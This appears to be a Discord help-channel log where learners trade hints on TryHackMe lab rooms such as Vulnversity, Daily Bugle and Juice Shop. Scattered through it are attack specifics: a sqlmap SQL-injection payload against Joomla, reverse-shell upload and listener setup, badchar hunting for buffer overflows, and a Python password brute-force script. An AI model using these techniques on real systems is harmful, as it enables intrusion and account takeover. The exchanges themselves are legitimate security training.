i restarted the browser and tried to access the same room in different browser but still doesn't lunch the Linux window. Note: the other machines can be deployed in different rooms !!

wintry yarrow
#

You have to ssh into that machine.

serene bronze
#

Hey!!
I need help urgently. There is this problem I have been stuck with since last night. So I am trying to solve the ice room challange and this is the error I am getting when I try to gain access using metasploit.
Exploit Completed but no session was created.

remote gate
#

@serene bronze what task are you on? did you make sure you set your lhost to your vpn ip?

serene bronze
#

@remote gate i did that. i set the lhost to vpn ip and then rhosts to target ip of machine but its not working.
I am in the room ICE - Task 3 - Last Question

remote gate
#

@serene bronze could you pm me a screenshot of your options?

cold oracle
#

need help on the machine

acoustic steppe
cold oracle
#

oh

wooden mist
#

Did you solve it with quipqiup or a tool like that?

#

Yeah so there are many tools that will be able to get you the original sentence but it was produced with a specific substitution in mind which you could argue isn't even a cipher. The layout you should focus on lies in front of you (literally)

remote gate
#

@serene bronze i just noticed.. one thing i'd ask is if you could refrain from asking for help in multiple channels like you did. thanks!

marsh saffron
#

Can anyone help me. I'm stuck at "Physical Security Intro" Task 6 Question no. 3, 5 and 8.

wintry yarrow
#

@marsh saffron ask in one channel please. πŸ™‚

marsh saffron
#

@wintry yarrow I'm sorry πŸ˜…

stark ravine
median compass
stark ravine
median compass
#

and did you try the username:password combinations suggested in the text?

#

one of the three suggested in the text will get you in

stark ravine
#

yes, i tried all of them and none would work, that's why I was so confused about it

median compass
#

I just tried it and it worked. WIth the creds, everything to the left of the : is username, everything to the right is password, don't include the :

#

and of course, you want to use those creds on the admin page you found in Task 1

stark ravine
#

thanks for your help, i'll try it out

stone cargo
#

Hi Folks. Can someone help me with the verification questions for 'Buffer Overflow Prep?' One of the repeating questions is:

In byte order (e.g. \x00\x01\x02) and including the null byte \x00, what were the badchars for OVERFLOWX?

#

I have been successfully exploiting these machines, but I can never seem to answer this question correctly.

#

for example, for overflow2 I identified bad characters \x00\x23\x24\x3c\x3d\x83\x84\xba\xbb I was able to use these characters to build an exploit and get a reverse shell, but the form will not accept them as a correct answer.

#

Am I somehow finding too many bad characters, or am I entering them incorrectly?

median compass
#

did you identify those characters all at once or iteratively? that's quite a lot of badchars. Sometimes if there is one badchar in your shellcode then many characters after it can be mis-identified as bad because the first one changes the meaning of the codes that follow. The best way to identify bad characters is to find one, add it to your exclusion list in msfvenom and run the shell code again, if you find another then add that to the list and run again, etc.

stone cargo
#

I see, that makes sense. I'm definitely doing it the lazy way of running a compare in mona (!mona compare -a esp -f c:\badchars.bin) and including all of the bad characters that it suggests.

#

I'll be less lazy next time and see if I have more luck.

median compass
#

yeah no, one at a time is the way

stone cargo
#

thanks!

median compass
#

good luck

stone cargo
#

can I still use the mona compare function to work iteratively? IE, is the first character flagged by mona more likely to be an actual bad character than the subsequent characters? Or do I need to find a new way to go through them one by one?

median compass
stone cargo
#

perfect, thanks again

visual jolt
#

in the NIS-Linux room, are we meant to escape rbash to find the flags in Task 1?

median compass
visual jolt
#

@median compass ok, thanks!

median compass
#

oh sorry, hang on, no no, the answers in task 1 are from a different room, it's to test have you done the prerequisites! @visual jolt

#

should have checked my notes before relying on my memory πŸ˜†

visual jolt
#

oh lol

#

πŸ™‚

#

yeah i did that room already πŸ˜‰

median compass
#

then you can just copy the answers over and you're good to go

visual jolt
#

that's hilarious

#

i thought they were new flags

#

so i escaped the rshell and was trying linpeas, etc.

#

when all i had to do was copy-paste

median compass
#

it's a simpler room than that, you'll fly through it I'm sure

visual jolt
#

yeah i finished everything but that task 1 already

#

i just skipped over it at the beginning cause i thought maybe i would find them doing the rest of the tasks

distant tartan
#

is owasp zap present in kali already

visual jolt
#

alright im gonna try Hack Park

#

wish me luck tipsfedora

median compass
median compass
distant tartan
median compass
distant tartan
#

not related to rooms just for knowledge

median compass
# distant tartan why all the machine we attack have that not secure sign on the top is it because...

these are vulnerable target boxes by design, that encryption layer is on when you do online shopping etc. to prevent anyone else from intercepting your traffic and getting useful info, credit card numbers etc. For the rooms here as a rule there is nothing like that happening, these rooms are only there for learning purposes. Some times you will see https traffic but the certificates will be self-signed anyway and that will still keep the padlock from going green - don't worry about it when you are on tryhackme

exotic raven
#

Hey all - welcome any help on Upload Vulnerability room task 4. I seem to lack the file necessary to unlock the flag. Any assist locating it would be welcome. FYI, I only have one file that matches the file type, but it goes by another name. Attempts to upload it were successful but didn’t reveal the flag

visual jolt
#

@exotic raven ||if you have the file type needed you can just rename it||

#

I'm stuck on Upload Vulns, too, but on Task 8, can't find the directory it uploaded to?

#

using directory-list-2.3-medium but it's taking foreevvaar

#

just keep enumerating deeper into the directories im guessing

#

alright im giving up on this for tonight

visual jolt
#

on the scripting task 2, when i connect to the host and send anything it just errors out, am i supposed to send something specific to the port so it will tell me the next instruction?

#

ok i think i get it nm

exotic raven
#

@visual jolt thanks for the tip!

digital edge
#

CC:pen test stuck on "what is the name of the
Hidden file with extension xxa"

white salmon
#

hey guys, merry christmas first of all

#

I am stuck on on task 11 of linux fundementals 2, my 3rd language is english, and I don't really understand what is asked me to do in this task "the challenge is pretty simple, the binary is checking to see if the environment variable test1234 exists, and if it's set to equal to the current $USER environment variable."

#

I am using export test1234=$USER, and I execute but I get a permission denied

#

what am I doing wrong here?

gusty turtle
#

You are logged in as shiba2 right?

white salmon
#

yeah

#

and I don't have permission

gusty turtle
#

Can you send a screenshot?

white salmon
#

i don't have discord on my kali machine

#

I can send you a photo

gusty turtle
white salmon
#

oh rly

gusty turtle
#

What is shiba3's password?

white salmon
#

yes this question

gusty turtle
#

you have shiba2 or shiba3 in your directory?

white salmon
#

ah my machine is expiring in 30 seconds, I'd appreciate the help and I'll try it next time

#

is it cheating that I am still ssh into it?

white salmon
#

no I am not subbed, I wish I could

gusty turtle
white salmon
#

yeah the room machine

#

the one that I press "Deploy"

#

but instead I ssh into it, because the browser machine on my internet sucks

gusty turtle
white salmon
#

what so you mean, I can stay ssh?

gusty turtle
white salmon
#

yeah Now I understand

#

I just got disconnected

gusty turtle
white salmon
#

but I can still answer the questions and learn using my kali machine

#

I completed the whole room, but im still stuck in that shiba3 password thingy

#

im sorry if i am a annoying but ive been trying for 3 days, I lost 3 hours of machine time trying to figure this question out

gusty turtle
white salmon
#

yeah and I can't sudo

#

so I need to be in a higher priviledged user

gusty turtle
#

||chmod||?

white salmon
#

or something like that

#

exactly but in this i am not supposed to know what chmod is

#

yet

#

but anyways thanks, ill figure it out tomorrow

#

Any hints for me pls?

Hello, i have a problem:
Room: https://tryhackme.com/room/furthernmap
Task 14

Perform an Xmas scan on the first 999 ports of the target -- how many ports are shown to be open or filtered?

sudo nmap -sX -p0-999 10.10.171.203
gives me:
22/tcp open|filtered ssh
80/tcp open|filtered http
111/tcp open|filtered rpcbind

Answer format: ***

but answer should be: 3 or three, but its wrong. What i doing wrong?

#

003

#

maybe?

white salmon
#

ahhaha i am dumb

gusty turtle
#

What happens to other ports?

white salmon
gusty turtle
white salmon
#

maybe i scan the wrong "machine_ip"
Perform a TCP SYN scan on the first 5000 ports of the target -- how many ports are shown to be open?
its 4, but the answer is incorrect
scanned with:
sudo nmap -sS -p0-5000 10.10.171.203

white salmon
# gusty turtle Try redeploying the machine.

Uh-oh! You are not a subscribed user and cannot deploy this machine. To subscribe visit your profile.
Oh my g0d...
i still conected via vpn, which ip to scan?, where i can find, which ip i have to scan for task 14?

gusty turtle
white salmon
digital edge
#

Hey guys I'm stuck...roomname cc pen testing task 4 last question what is the name of the hidden file with the extension xxa ?

#

I can't curl any of the .txt I found on the server. Says I don't have permission..?

remote gate
digital edge
#

NoΒΏ Of course I fallowed the write-up but in it says to look for a .txt? At least I swore those were the instructions

#

Ok well thanks I'll try that

#

Matter fact I'll write up says a certain file should appear and it doesn't even show up on mines so that's off...?

#

The*

#

Nope unsuccessful...that .xxa file found don't help

remote gate
#

it could be that it was an old writeup and the room changed since it was created. what do you mean by didnt help?

digital edge
#

Well I tried accessing the phone
.xxa files can't access anything from then

remote gate
#

are we looking at the same question? Task 4?

What is the name of the hidden file with the extension xxa

digital edge
#

Sorry yes xxa

#

The file is located on the un a home for of a user

#

In the write-up I'm supposed to look for .txt via gobuster more specifically file called secret.txt but unable to locate?

#

Wait I found something...

#

Got it they changed it alright

#

Ty

remote gate
#

@white salmon tldr the writeup he's following (think the one attached to the room?) shows a secret.txt.. but looks like thats not there anymore?

white salmon
#

uh

digital edge
#

Yup

#

Exactly

white salmon
#

i didnt touch the box

#

if the writeup is wrong then i guess ill just remove it

digital edge
#

Well it not how the write up described

#

At the last parts don't match the writeup

#

But thanks

white salmon
#

hint for dogcat?

#

me and @white salmon are stuck

keen flax
#

Hint for nmap scan for flag -p-400 please

#

nvm figured it out

#

I was just being dumb

keen flax
#

It says If you are using Kali Linux you can find many wordlists under /usr/share/wordlists. But I am using Manjaro so how do I find the wordlists?

night fractal
#

right here

#

you can git clone the whole repo or you can just download the ones you want

#

@keen flax

keen flax
#

I am actually doing the Vulnversity

#

so will that work?

twin stratus
#

@keen flax You want this...

keen flax
#

ok

twin stratus
#

SecLists is a great bunch of wordlists, but for what youre doing (leep it simple..) when you clone the repo itll have an ok wordlist for vulneversity, I would clone SecLists as well, you will use it

keen flax
#

do I clone the whole SecLists reop?

twin stratus
#

yes.

#

well, i mean you can, or you can just grab the ones you want..

keen flax
#

ok

twin stratus
#

Sorry @night fractal didnt mean to step on your toes.

night fractal
# keen flax so will that work?

they want you to use wordlists for gobuster so you could just get https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/directory-list-2.3-medium.txt for a more thorough search, and https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/common.txt for a faster search of the most common directories

night fractal
twin stratus
#

Yeah, I sensed that after I jumped all in it...its Christmas, my son wouldnt let me sleep, so I wasnt thinking lol

#

IM like "nope, not today"

night fractal
#

dang

#

good for me I'm ugly af so no kids will bother me

twin stratus
#

lololol awww

#

im ugly asf and my kids still bother me...

night fractal
#

my mans got lucky

twin stratus
#

so i dont think that has anything to do with it lol

night fractal
#

good for you

twin stratus
#

nah, i got 5...luck was not with me

night fractal
twin stratus
#

Bruv...theres someone for everyone....sometimes it just takes time...

night fractal
twin stratus
night fractal
#

yeah, takes a lot of patience and hard work, I'm glad that you can keep it up

white salmon
#

Room:
https://tryhackme.com/room/dailybugle

I figured out Joomla Version, found SQLi, dumped passwords with sqlmap, get a user named root with hash, but no success in cracking it with simple rockyou + best64.rules

Am I right, i should not crack this root mysql password?
Am I right, i should look for joomla users in Database via SQLi to obtain another users hash?

Someone is doing this box right now?

The box went off, after 1h + 1h extended, so i deployed again, but sqlmap need figuring out again the injection points.

||Parameter: list[fullordering] (GET)
Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 9809 FROM(SELECT COUNT(*),CONCAT(0x716a6a7671,(SELECT (ELT(9809=9809,1))),0x716a7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)||

How i can faster resume sqlmap while IP/domain is changing?
Thank u for some hints and telling me if iam on the right way to own the box.

keen flax
#

gobuster dir -u http://<ip>:3333 -w <word list location> This cmd

gusty turtle
night fractal
#

can you post the output of the gobuster command that you ran?

keen flax
#

It was doing this
Progress : num/4662

night fractal
#

did you get something similar to this

keen flax
#

yes

night fractal
#

so you hit some directories like /uploads or /admin ?

keen flax
#

[+] Wordlist: /usr/share/wordlists/common

night fractal
#

k, that's good

#

I'm interested in the output of the search tho

#

kinda like on that screenshot you can see it hit /index /index.php and lots of others

#

did you get any hits?

keen flax
#
/.hta                 (Status: 403) [Size: 293]
/.htaccess            (Status: 403) [Size: 298]
/.htpasswd            (Status: 403) [Size: 298]
/css                  (Status: 301) [Size: 317] [--> http://10.10.163.86:3333/css/]
Progress: 1313 / 4662 (28.16%)                                              Progress: 1324 / 4662 (28.40%)               
```Do you mean this?
night fractal
#

yeah

#

those are all directories that exist on the box

#

let it run through the whole wordlist and see if there's anything interesting

keen flax
#

I think I will run the command again cuz I think it was messed up

night fractal
#

it should be just gobuster dir -u http://BOXIP -w /full/path/to/wordlist

keen flax
#

um I think I found it

#

||/internal/||

night fractal
#

bingo

keen flax
#

thx for the help

night fractal
#

you're welcome πŸ˜„

keen flax
#

btw I am stuck here Compromise the webserver lol

night fractal
#

where exactly are you stuck

keen flax
#

idk where to start

#

Try upload a few file types to the server, what common extension seems to be blocked?

#

it says this

night fractal
#

yeah

keen flax
#

but it never told how to upload

white salmon
night fractal
keen flax
#

let me see

#

I will just have to learn Burp Suite then I think I am good to go

night fractal
#

tbh you don't even need burp for this room

#

but learning Burp can be helpful

#

it's just a bit messed bc the interface changed since lot of the tutorials were made

keen flax
#

I mean it says there

To identify which extensions are not blocked, we're going to fuzz the upload form.

To do this, we're doing to use BurpSuite. 
night fractal
#

yeah

#

but then they're gonna upload 5 files

#

which you could've done on your own

#

my suggestion is to leave Burp for later, like after finishing this room, bc it can be useful, but then again it is your choice and I'm not making you do anything against your will

keen flax
night fractal
keen flax
#

nope

night fractal
#

even with the port 3333?

#

'cause I'm pretty sure there should be a page where you can upload files bc if you're gonna use burp you'll first want to capture some traffic, which will be generated from your browser by visiting a page and interacting with it

keen flax
#

Secure Connection Failed

night fractal
#

are you by any chance trying to visit it via https and not http?

keen flax
#

wait now it worked

#

weird

#

without http it worked lmao how

night fractal
#

idk to be fair, I'm pretty sure visiting it without http and putting http in front doesn't change anything

#

putting https does change some things tho

night fractal
keen flax
#

ok

night fractal
#

now you can either set up a proxy and capture some traffic with burp, and then automate uploading files with different extensions

keen flax
#

oof let me add .txt in front of my file xD

night fractal
#

or you can just make some files of your own and do it manually

keen flax
#

ok

night fractal
#

without messing with proxy server and burp

keen flax
#

ummm

#

I try to upload common.txt it says extension not allowed

night fractal
#

for whatever reason they just don't allow uploading .txt files

#

you can try some other extensions like .png .jpg and what you're mostly interested in .php and similar extensions that allow you to embed php code in them

keen flax
#

ok

#

Can the .php file be empty?

night fractal
#

yeah

#

you're just fuzzing for what file extensions are allowed

keen flax
#

weird

#

.php also says Extension not allowed

night fractal
#

yeah

#

which makes sense

#

if someone uploads a .php file they could get code execution by navigating to the ||uploads folder|| that you also hopefully found with gobuster

keen flax
#

.php are blocked right

night fractal
#

yup

#

you may wanna search online for what php extensions exist, since .php isn't the only one

keen flax
#

I know some

night fractal
#

can you successfully upload any of them?

keen flax
#

yes

night fractal
#

that's great

#

now you can keep following the room instructions

keen flax
#

Whenever I visit : http://<ip>:3333/internal/uploads/php-reverse-shell.phtml
I get : WARNING: Failed to daemonise. This is quite common and not fatal. Connection timed out (110)

night fractal
#

first of all, did you change the IP and port in the revshell?

keen flax
#

yes

night fractal
#

good

#

did you start a listener on your machine?

keen flax
#

nc -lvnp 3333 yep

night fractal
#

yeah, that's gonna start a listener on port 3333

#

and I guess you set the port to 3333 in the revshell

#

?

keen flax
#

yes

night fractal
#

might be your firewall then

keen flax
#

hmm let me disable it

#

it was firewall

night fractal
#

makes sense

solemn smelt
#

@keen flax If you are experiencing an issue with the reverse shell on AoC2 Day 2 with a failed to daemonize, connection refused (111) error, run through these steps to see if it resolves:

  1. Is your listener running as root? ports below 1024 require root privileges to open you need to either have a root account or use sudo an example of this would be sudo nc -lvnp 443.
  2. Your port number in the reverse shell script must be same as in your listener.
  3. Your IP in the reverse shell script should not be 10.10.x.x that is your room IP, you need to use your eth0 / tun0 IP depending on if youre using the in-browser machines or openvpn.
#

I wrote that for AOC day 2 but it’s still relevant for what you’re doing

#

If you get a connection timed out it’s almost always because your listener is improperly setup or your script is improperly setup

keen flax
#

I am doing Vulnversity

night fractal
#

they said the problem was in the firewall tho

night fractal
#

so I'm assuming they got it working fine

keen flax
#

yes

night fractal
#

@solemn smelt

keen flax
#

So this is what it asks What is the name of the user who manages the webserver? but the thing I got in terminal doesn't tell that

night fractal
#

which user are you right now

keen flax
#

?

night fractal
#

in linux

#

how do you know which user are you logged in as?

keen flax
#

whoami?

night fractal
#

yup

keen flax
#

yea I tried that

#

but it is incorrect

stuck fractal
#

It's not what user is it running as

#

It's who manages it

night fractal
#

true

#

I just forgot how I got the answer so I thought maybe it logs you in as that user

#

so you can see are there any users in /home

keen flax
#

OwO

keen flax
#

how are you supposed to know that

night fractal
#

most of your users that are used by people and not services have their own home directory

#

it's common linux knowledge

tall rain
#

Hello guys, i'm doing Bookstore room and have a question about privesc to root. I saw binary file try-harder, and i saw that it needs to be reversed somehow. Any advice for reverse tool aside from ghidra?

night fractal
#

there's IDA, but I don't know how useful the free version is

#

you can use radare but it's kinda messed up unless you're used to it

tall rain
#

Nvm, i just try ghidra and it is not as hard as i thought

white salmon
#

Room:
https://tryhackme.com/room/dailybugle

Im trying msf6 exploit(unix/webapp/joomla_comfields_sqli_rce) on this Joomla ||3.7.0||
but msf check fails, exploit fails with "Error retrieving table prefix"
i looked here, but cant read ruby: https://www.exploit-db.com/exploits/44358
wireshark show me error 500 while trying check or exploit

How to get this RCE working or is it because of the wired table prefixes I discovered with sqlmap? Should I stop trying use MSF RCE, should I focus on webshell and privesc? Thank u

what i got till now is joomla version, mysql root hash, joomla superuser username and hash and password, but still no root (ssh) :-)

Any suggestion for me please?

stuck fractal
#

@white salmon the RCE isn't the intended route so I'd skip over it.

#

If you've got a shell, focus on escalation

digital edge
#

Sec list already comes with kali

broken quail
#

On linux strength training, Task 9, I was trying to create a hash file of sql backups, but it's keep showing this. Any hints?

white salmon
#

hello guys , on linux strength training , task 9 im stuck on sql back-up password , any hint ?

white salmon
#

does anyone know the answer to the question "What i sthe value of the web.txt flag?" of the last day? i am stuck and run out of time, and even if you know about the user.txt flag and robot.txt flag last day

#

i am talking about the adventofcyber2 room

still dust
white salmon
white salmon
#

Hey there, stuck with linux fundamentals 2 task 11. guess you need to execute ./shiba2 to get shiba3's passwd, but this only generates a segmentation fault (core dumped). Any hints appreciated!

stuck fractal
#

That means you haven't set the variable @white salmon

white salmon
#

thx a lot NinjaJc01|James!

zinc oyster
#

I'm trying to do the https://tryhackme.com/room/owaspjuiceshop task 4/question 1 but the burp intruder attack using the best1050.txt password list has been running for about 20 minutes and it's only at password 275. (I'm using the attack box). Is there something that could be done to speed things up or some config I might have done wrong to have such slow speeds? It seems to be entirely internal to burp. And ofc still no 200 response

#

I also tried to emulate the attack with a python script ||```import requests
from pathlib import Path
p = Path('/usr/share/wordlists/SecLists/Passwords/Common-Credentials/best1050.txt')
s = requests.session()
s.get('http://10.10.207.58')
for pwd in p.read_text().split():
print(pwd)
if s.post('http://10.10.207.58/rest/user/login', data={"email":"admin@juice.sh.op","password":pwd.strip()}).status_code != 401:
print("!!!")
break

cedar axle
#

@zinc oyster use OWASP zap

#

or even wfuzz

zinc oyster
#

yeah I was considering wfuzz but wasn't sure if it handled json payloads / if the server accepted query params instead of json

cedar axle
#

yeah, it will send whatever data you tell it to

zinc oyster
#

nice I'll try and see if there's more luck there, but it's a bit strange as it's a very step by step room that it has a part that seems to take hours to complete

cedar axle
#

yeah they assume you have BURP premium

#

like who's gonna have that?

#

anyway zap is probably nearly as good as burp, save a few features

zinc oyster
#

yeah, a bit more a challenge to translate the instructions to zap, but perhaps better learning πŸ€·β€β™‚οΈ but there's something I'm doing wrong too because non of the passwords seems to work

cedar axle
#

take a screenshot of your intruder window

#

in your python script you have admin@juice.sh.op should it be admin@juice-sh.op

zinc oyster
#

oh a typo! thanks i'll try it without

#

typos are my enemy no1

cedar axle
#

lol

#

the answer is in the first 200 in that file so you if you get past that theres something wrong

zinc oyster
#

yeah had same typo in burp

red sandal